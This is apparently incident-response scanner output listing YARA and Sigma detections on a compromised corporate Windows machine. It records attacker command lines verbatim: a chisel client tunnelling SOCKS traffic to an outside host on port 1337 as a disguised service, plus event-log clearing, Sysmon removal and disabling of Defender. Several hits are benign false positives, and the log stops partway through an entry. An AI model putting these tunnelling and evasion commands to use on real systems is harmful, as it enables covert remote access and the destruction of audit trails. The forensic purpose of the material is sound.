ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Mon Jul 29 01:24:54.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
YARA rule SUSP_PS1_FunctionImports_Jul22_1 / Detects PowerShell tools for new process creations
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-07-29
TAGS_1:
SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_PS1_FunctionImports_Jul22_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1

Warning 18
Sep 10 12:30:08 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\utils_tests\traversal_archives\traversal.tar\evil.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Fri Jan 22 10:01:29.000 2021
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \evil.py
SUBSCORE_1:
65
REF_1:
Typical reverse shell names / suspicious file name
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1

Warning 19
Sep 10 12:30:08 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip\django-main\tests\utils_tests\traversal_archives\traversal_absolute.tar\tmp\evil.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Fri Jan 22 10:46:59.000 2021
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Tue Aug 6 16:22:42.825 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:43.466 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \evil.py
SUBSCORE_1:
65
REF_1:
Typical reverse shell names / suspicious file name
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1

Warning 20
Sep 10 12:31:19 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
70
FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_utils_Ansible.Become\library\ansible_become_tests.ps1
EXT:
.ps1
TYPE:
Script
SIZE:
47988
FIRSTBYTES:
2321706f7765727368656c6c0a0a23416e736962 / #!powershell #Ansib
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Documents\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Tue Aug 6 16:22:44.712 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Aug 6 16:22:44.934 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
YARA rule SUSP_PS1_FunctionImports_Jul22_1 / Detects PowerShell tools for new process creations
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-07-29
TAGS_1:
SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_PS1_FunctionImports_Jul22_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1

Warning 21
Sep 10 12:34:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Windows\Logs\DISM\dism.log
EXT:
.log
TYPE:
UNKNOWN
SIZE:
560370
FIRSTBYTES:
efbbbf323032342d30362d30332031393a34363a / 2024-06-03 19:46:
CREATED:
Mon Jun 3 19:46:10.786 2024
MODIFIED:
Tue Sep 3 02:33:23.464 2024
ACCESSED:
Tue Sep 3 02:33:23.464 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule SUSP_PowerShell_Command_Rare_CmdLine_Arguments / Detects suspicious abbreviated forms of command line arguments used when executing powershell commands
SUBSCORE_1:
65
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2020-01-02
TAGS_1:
FILE, SCRIPT, SUSP, T1059_001
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1

Warning 22
Sep 10 12:35:24 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
75
FILE:
E:\Windows\Prefetch\CHISEL.EXE-B229BF2C.pf
EXT:
.pf
TYPE:
UNKNOWN
SIZE:
4912
FIRSTBYTES:
4d414d04b2560000858ac6cba78abcbb888bbccb / MAMV˧
CREATED:
Tue Sep 3 09:39:00.911 2024
MODIFIED:
Tue Sep 3 09:39:00.911 2024
ACCESSED:
Tue Sep 3 13:34:02.433 2024
PERMISSIONS:
BUILTIN\Administrators:F
OWNER:
BUILTIN\Administrators
REASON_1:
Filename IOC \chisel.exe
SUBSCORE_1:
75
REF_1:
Lorenz Ransomware IOCs https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1

Warning 23
Sep 10 12:39:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
60
FILE:
E:\Windows\System32\SenseSubAuth.dll
EXT:
.dll
TYPE:
EXE
SIZE:
135168
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Mon Jun 3 20:29:49.654 2024
MODIFIED:
Mon Jun 3 20:29:49.654 2024
ACCESSED:
Mon Jul 22 12:26:34.592 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
COMPANY:
Microsoft Corporation
DESC:
Sense Sub-Authentication Package DLL.
LEGAL_COPYRIGHT:
© Microsoft Corporation. All rights reserved.
PRODUCT:
Microsoft® Windows® Operating System
ORIGINAL_NAME:
SenseSubAuth.dll
INTERNAL_NAME:
SenseSubAuth.dll
IMPHASH:
c53844792b0055bcd17ec940196a203b
REASON_1:
YARA rule SUSP_Msv1_0SubAuthenticationFilter_Export / Detects suspicious unsigned file with Msv1_0SubAuthenticationFilter export
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2020-02-28
TAGS_1:
EXE, FILE, SUSP
RULENAME_1: SUSP_Msv1_0SubAuthenticationFilter_Export
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1

Warning 24
Sep 10 12:44:10 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
70
FILE:
E:\Windows\System32\WindowsPowerShell\v1.0\Modules\Carbon\IIS\Install-IisApplication.ps1
EXT:
.ps1
TYPE:
UNKNOWN
SIZE:
4009
FIRSTBYTES:
2320436f70797269676874203230313220416172 / # Copyright 2012 Aar
CREATED:
Tue Jun 24 23:29:44.000 2014
MODIFIED:
Tue Jun 24 23:29:44.000 2014
ACCESSED:
Tue Jul 23 12:57:34.163 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule SUSP_PS1_OBFUSC_FormatString_Sep22_2 / Detects a common PowerShell obfuscation technique that reorders format strings - FPs with legitmate scripts are possible
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-09-28
TAGS_1:
OBFUS, SCRIPT, SUSP, T1027, T1059_001
RULENAME_1: SUSP_PS1_OBFUSC_FormatString_Sep22_2
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1

Warning 25
Sep 10 12:44:58 WIN-LRTT94FA08M/10.100.5.12
MODULE:
RegistryHive
MESSAGE:
Suspicious registry hive entries found
ENTRY:
ROOT\Microsoft\Windows Defender\Exclusions\Paths;C:\Windows\SysWOW64\;0
SCORE:
70
PATH:
E:\Windows\System32\config\SOFTWARE
KEY:
ROOT\Microsoft\Windows Defender\Exclusions\Paths
MODIFIED:
Tue Sep 3 09:12:08 2024
REASON_1:
YARA rule SUSP_Microsoft_Defender_Exclusions_Paths_Sep22 / Detects suspicious Microsoft Defender exclusions that should be reviewed
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-09-29
TAGS_1:
REG, SUSP, T1112
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1

Warning 26
Sep 10 12:53:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
RegistryHive
MESSAGE:
Suspicious registry hive entries found
ENTRY:
ROOT\ControlSet001\Services\telemetryservice\Parameters;Application;C:\Windows\SysWOW64\chisel.exe
SCORE:
75
PATH:
E:\Windows\System32\config\SYSTEM
KEY:
ROOT\ControlSet001\Services\telemetryservice\Parameters
MODIFIED:
Tue Sep 3 09:37:17 2024
REASON_1:
Filename IOC \chisel.exe
SUBSCORE_1:
75
REF_1:
Lorenz Ransomware IOCs https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
C:\Windows\SysWOW64\chisel.exe
EXISTS_1:
no

Warning 27
Sep 10 12:53:54 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
70
FILE:
E:\Windows\System32\config\SYSTEM
EXT:
TYPE:
Registry Hive
SIZE:
14680064
FIRSTBYTES:
7265676623500000225000000000000000000000 / regf#P"P
CREATED:
Sat May 7 05:17:22.616 2022
MODIFIED:
Tue Sep 3 08:59:48.291 2024
ACCESSED:
Tue Sep 3 08:59:48.291 2024
PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule HKTL_Mimikatz_Mimilib_DNS / Detects Mimilib DNS Method
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2019-04-29
TAGS_1:
HKTL, S0002, T1003, T1134_005, T1550_002, T1550_003
RULENAME_1: HKTL_Mimikatz_Mimilib_DNS
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 28
|
Sep 10 12:53:54 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
70
FILE:
E:\Windows\System32\config\SYSTEM.LOG2
EXT:
.LOG2
TYPE:
Registry Hive
SIZE:
2056192
FIRSTBYTES:
72656766ed500000ed5000000000000000000000 / regfPP
CREATED:
Sat May 7 05:17:22.663 2022
MODIFIED:
Sat May 7 05:17:22.663 2022
ACCESSED:
Sat May 7 05:17:22.663 2022
PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule HKTL_Mimikatz_Mimilib_DNS / Detects Mimilib DNS Method
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2019-04-29
TAGS_1:
HKTL, S0002, T1003, T1134_005, T1550_002, T1550_003
RULENAME_1: HKTL_Mimikatz_Mimilib_DNS
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 29
|
Sep 10 12:55:58 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Suspicious eventlog entry found
ENTRY:
Data: [C:\Windows\SysWOW64\chisel.exe client sharepoint-content.com:1337 R:socks telemetryservice C:\Windows\SysWOW64] Provider_Name: nssm EventID_Qualifiers: 16384 EventID_Value: 1008 Version: 0 Level: 4 Task: 0 Opcode: 0 Keywords: 36028797018963968 TimeCreated_SystemTime: 1.7253563323225088e+09 EventRecordID: 3978 Execution_ProcessID: 7500 Execution_ThreadID: 0 Channel: Application Computer: pc01243.MercuryLark.corp
SCORE:
75
FILE:
E:\Windows\System32\winevt\Logs\Application.evtx
EVENT_ID:
1008
EVENT_LEVEL:
4
EVENT_CHANNEL:
Application
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:38:52 2024
REASON_1:
Filename IOC \chisel.exe
SUBSCORE_1:
75
REF_1:
Lorenz Ransomware IOCs https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
C:\Windows\SysWOW64\chisel.exe
EXISTS_1:
no
FILE_2:
E:\Windows\System32\winevt\Logs\Application.evtx
EXISTS_2:
yes
TYPE_2:
EVTX
SIZE_2:
2166784
FIRSTBYTES_2:
456c6646696c6500000000000000000018000000 / ElfFile
CREATED_2:
Tue Jun 4 02:25:39.557 2024
OWNER_2:
NT AUTHORITY\LOCAL SERVICE
|
Warning 30
|
Sep 10 12:56:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx
EVENT_ID:
1
EVENT_LEVEL:
4
EVENT_CHANNEL:
Microsoft-Windows-Sysmon/Operational
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:15:57 2024
ENTRY:
RuleName: - UtcTime: 2024-09-03 09:15:57.276 ProcessGuid: 553FCD21-D3CD-66D6-D001-000000001100 ProcessId: 7672 Image: C:\Windows\SysWOW64\wevtutil.exe FileVersion: 10.0.22621.3085 (WinBuild.160101.0800) Description: Windows Event Log Utility Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: wevtutil.exe CommandLine: wevtutil cl Microsoft-Windows-Sysmon/Operational CurrentDirectory: C:\Windows\SysWOW64\ User: NT AUTHORITY\SYSTEM LogonGuid: 553FCD21-D016-66D6-E703-000000000000 LogonId: 999 TerminalSessionId: 2 IntegrityLevel: System Hashes: SHA1=EE7A5D82EBB06922541C35146508FE2634D5E9C6,MD5=82B7D34D7CF8AA479E68D20A7F995807,SHA256=0A90284CE5FD716B5A03307F69E3D50C7A99C4C2489C077DA27097CB35FA58A7,IMPHASH=9DC44599DBFD289FD6D31560E274272B ParentProcessGuid: 553FCD21-D3CD-66D6-CE01-000000001100 ParentProcessId: 2052 ParentImage: C:\Windows\SysWOW64\cmd.exe ParentCommandLine: cmd.exe /S /c wevtutil cl Microsoft-Windows-Sysmon/Operational ParentUser: NT AUTHORITY\SYSTEM Provider_Name: Microsoft-Windows-Sysmon Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 EventID: 1 Version: 5 Level: 4 Task: 1 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7253549572866256e+09 EventRecordID: 6416116 Execution_ProcessID: 3376 Execution_ThreadID: 4616 Channel: Microsoft-Windows-Sysmon/Operational Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-18
SCORE:
70
REASON_1:
Suspicious Eventlog Clear or Configuration Change
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/07/13
DESCRIPTION_1:
Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).
AUTHOR_1:
Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105
ID_1:
cc36992a-4671-4f21-a91d-6c2b72a2edf5
FALSEPOSITIVES_1:
Admin activity, Scripts and administrative tools used in the monitored environment, Maintenance activity
REASONS_COUNT:
1
|
Warning 31
|
Sep 10 12:56:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx
EVENT_ID:
1
EVENT_LEVEL:
4
EVENT_CHANNEL:
Microsoft-Windows-Sysmon/Operational
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:17:39 2024
ENTRY:
RuleName: - UtcTime: 2024-09-03 09:17:39.550 ProcessGuid: 553FCD21-D433-66D6-D701-000000001100 ProcessId: 8136 Image: C:\Program Files\Sysmon\Sysmon64.exe FileVersion: 15.14 Description: System activity monitor Product: Sysinternals Sysmon Company: Sysinternals - www.sysinternals.com OriginalFileName: - CommandLine: "C:\Program Files\Sysmon\Sysmon64.exe" -u CurrentDirectory: C:\Windows\SysWOW64\ User: NT AUTHORITY\SYSTEM LogonGuid: 553FCD21-D016-66D6-E703-000000000000 LogonId: 999 TerminalSessionId: 2 IntegrityLevel: System Hashes: SHA1=2F707CC7A635CA9824EBE825ADE3BAA77BC5874C,MD5=99C68A0A2EE8E42EBB52E1C84F80B730,SHA256=39B094613132377BC236F4AD940A3E02C544F86347C0179A9425EDC1BD3B85CD,IMPHASH=A039666F8D08DD16E0909469DA998438 ParentProcessGuid: 553FCD21-D433-66D6-D601-000000001100 ParentProcessId: 9620 ParentImage: C:\Windows\SysWOW64\cmd.exe ParentCommandLine: cmd /c "C:\Program Files\Sysmon\Sysmon64.exe" -u ParentUser: NT AUTHORITY\SYSTEM Provider_Name: Microsoft-Windows-Sysmon Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 EventID: 1 Version: 5 Level: 4 Task: 1 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7253550596455505e+09 EventRecordID: 6416508 Execution_ProcessID: 3376 Execution_ThreadID: 4616 Channel: Microsoft-Windows-Sysmon/Operational Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-18
SCORE:
70
REASON_1:
Uninstall Sysinternals Sysmon
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/03/09
DESCRIPTION_1:
Detects the removal of Sysmon, which could be a potential attempt at defense evasion
AUTHOR_1:
frack113
ID_1:
6a5f68d1-c4b5-46b9-94ee-5324892ea939
FALSEPOSITIVES_1:
Legitimate administrators might use this command to remove Sysmon for debugging purposes
REASONS_COUNT:
1
|
Warning 32
|
Sep 10 12:56:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx
EVENT_ID:
4
EVENT_LEVEL:
4
EVENT_CHANNEL:
Microsoft-Windows-Sysmon/Operational
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:17:39 2024
ENTRY:
UtcTime: 2024-09-03 09:17:39.767 State: Stopped Version: 15.14 SchemaVersion: 4.90 Provider_Name: Microsoft-Windows-Sysmon Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 EventID: 4 Version: 3 Level: 4 Task: 4 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7253550597754016e+09 EventRecordID: 6416509 Execution_ProcessID: 3376 Execution_ThreadID: 4620 Channel: Microsoft-Windows-Sysmon/Operational Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-18
SCORE:
70
REASON_1:
Sysmon Configuration Modification
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2022/08/02
DESCRIPTION_1:
Detects when an attacker tries to hide from Sysmon by disabling or stopping it
AUTHOR_1:
frack113
ID_1:
1f2b5353-573f-4880-8e33-7d04dcf97744
FALSEPOSITIVES_1:
Legitimate administrative action
REASONS_COUNT:
1
|
Warning 33
|
Sep 10 12:56:59 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx
EVENT_ID:
5001
EVENT_LEVEL:
4
EVENT_CHANNEL:
Microsoft-Windows-Windows Defender/Operational
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 09:12:50 2024
ENTRY:
ProductName: Microsoft Defender Antivirus ProductVersion: 4.18.24070.5 Provider_Name: Microsoft-Windows-Windows Defender Provider_Guid: 11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78 EventID: 5001 Version: 0 Level: 4 Task: 0 Opcode: 0 Keywords: 9223372036854775808 TimeCreated_SystemTime: 1.7253547705231264e+09 EventRecordID: 3169 Execution_ProcessID: 3516 Execution_ThreadID: 3448 Channel: Microsoft-Windows-Windows Defender/Operational Computer: pc01243.MercuryLark.corp Security_UserID: S-1-5-18
SCORE:
70
REASON_1:
Windows Defender Threat Detection Disabled
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2022/12/06
DESCRIPTION_1:
Detects disabling Windows Defender threat protection
AUTHOR_1:
Ján Trenčanský, frack113
ID_1:
fe34868f-6e0e-4882-81f6-c43aa8f15b62
FALSEPOSITIVES_1:
Administrator actions (should be investigated), Seen being triggered occasionally during Windows 8 Defender Updates
REASONS_COUNT:
1
|
Warning 34
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
1102
EVENT_LEVEL:
4
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 10:11:04 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: SYSTEM SubjectDomainName: NT AUTHORITY SubjectLogonId: 999 ClientProcessId: 2040 ClientProcessStartKey: 4785074604081773 Provider_Name: Microsoft-Windows-Eventlog Provider_Guid: {fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148} EventID: 1102 Version: 1 Level: 4 Task: 104 Opcode: 0 Keywords: 4620693217682128896 TimeCreated_SystemTime: 1.7253582649479408e+09 EventRecordID: 143904 Execution_ProcessID: 2160 Execution_ThreadID: 8740 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Security Eventlog Cleared
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2022/02/24
DESCRIPTION_1:
One of the Windows Eventlogs has been cleared. e.g. caused by "wevtutil cl" command execution
AUTHOR_1:
Florian Roth (Nextron Systems)
ID_1:
d99b79d2-0a6f-4f46-ad8b-260b6e17f982
FALSEPOSITIVES_1:
Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog), System provisioning (system reset before the golden image creation)
REASONS_COUNT:
1
|
Warning 35
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 10:11:04 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 2040 NewProcessName: C:\Windows\SysWOW64\wevtutil.exe TokenElevationType: %%1936 ProcessId: 3952 CommandLine: wevtutil cl Security TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\SysWOW64\cmd.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.725358264880416e+09 EventRecordID: 143907 Execution_ProcessID: 4 Execution_ThreadID: 2784 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Eventlog Clear or Configuration Change
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/07/13
DESCRIPTION_1:
Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).
AUTHOR_1:
Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105
ID_1:
cc36992a-4671-4f21-a91d-6c2b72a2edf5
FALSEPOSITIVES_1:
Admin activity, Scripts and administrative tools used in the monitored environment, Maintenance activity
REASONS_COUNT:
1
|
Warning 36
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
EVENT_COMPUTER:
pc01243.MercuryLark.corp
EVENT_TIME:
Tue Sep 3 11:01:59 2024
ENTRY:
SubjectUserSid: S-1-5-18 SubjectUserName: PC01243$ SubjectDomainName: MERCURYLARK SubjectLogonId: 999 NewProcessId: 9328 NewProcessName: C:\Windows\System32\sdbinst.exe TokenElevationType: %%1936 ProcessId: 5032 CommandLine: C:\Windows\System32\sdbinst.exe -m -bg TargetUserSid: S-1-0-0 TargetUserName: - TargetDomainName: - TargetLogonId: 0 ParentProcessName: C:\Windows\System32\svchost.exe MandatoryLabel: S-1-16-16384 Provider_Name: Microsoft-Windows-Security-Auditing Provider_Guid: 54849625-5478-4994-A5BA-3E3B0328C30D EventID: 4688 Version: 2 Level: 0 Task: 13312 Opcode: 0 Keywords: 9232379236109516800 TimeCreated_SystemTime: 1.7253613194657888e+09 EventRecordID: 144034 Execution_ProcessID: 4 Execution_ThreadID: 4460 Channel: Security Computer: pc01243.MercuryLark.corp
SCORE:
70
REASON_1:
Suspicious Shim Database Installation via Sdbinst.EXE
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
Sigma Rule
MATCHED_1
RULEDATE_1:
2023/08/01
DESCRIPTION_1:
Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims
AUTHOR_1:
Nasreddine Bencherchali (Nextron Systems)
ID_1:
18ee686c-38a3-4f65-9f44-48a077141f42
FALSEPOSITIVES_1:
Unknown
REASONS_COUNT:
1
|
Warning 37
|
Sep 10 12:57:02 WIN-LRTT94FA08M/10.100.5.12
MODULE:
EVTX
MESSAGE:
Sigma match on eventlog entry
FILE:
E:\Windows\System32\winevt\Logs\Security.evtx
EVENT_ID:
4688
EVENT_LEVEL:
0
EVENT_CHANNEL:
Security
